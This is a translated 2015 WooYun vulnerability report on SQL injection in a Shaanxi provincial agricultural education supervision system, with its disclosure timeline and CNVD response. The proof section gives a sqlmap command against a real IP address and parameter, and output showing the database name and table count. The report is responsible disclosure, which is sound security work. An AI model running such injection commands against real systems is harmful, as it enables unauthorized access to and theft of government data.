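Vulnerability Summary
Bug ID: wooyun-2015-0108506
Title: SQL injection in the Shaanxi Province agricultural science and education supervision system, leaking a large amount of information
Vendor: Shaanxi Agriculture
Author: 路人甲
Submitted: 2015-04-21 19:21
Fixed: 2015-06-08 15:38
Published: 2015-06-08 15:38
Vulnerability type: SQL injection
Severity: Medium
Self-assessed Rank: 10
Status: Handed over to a third-party partner organization (CNCERT, the National Internet Emergency Center) for handling
Source: http://www.wooyun.org; for questions or help, contact [email protected]
Tags: none
Vulnerability Details
Disclosure status:
2015-04-21: Details reported to the vendor; awaiting vendor handling
2015-04-24: Vendor confirmed; details disclosed to the vendor only
2015-05-04: Details disclosed to core white hats and experts in related fields
2015-05-14: Details disclosed to regular white hats
2015-05-24: Details disclosed to intern white hats
2015-06-08: Details disclosed to the public
Brief description:
SQL injection in the Shaanxi Province agricultural science and education supervision system, leaking a large amount of information
Detailed description:
Proof of vulnerability:
Injection point: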
sqlmap -u "http://1.85.55.38:8080/i_cxxx.jsp?dqdm=" --technique e --current-db
Database: nypxgl
[107 tables]
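Remediation:
Modify the code
Copyright notice: when reposting, please credit the source 路人甲@乌云
Vulnerability Response
Vendor response:
Severity: Medium
Vulnerability Rank: 10
Confirmed: 2015-04-24 15:37
Vendor reply:
CNVD confirmed and reproduced the vulnerability as described and has passed it to CNCERT, which forwarded it to the Shaanxi branch center; the Shaanxi branch center will follow up and coordinate with the website's operating organization to handle it.
Latest status:
None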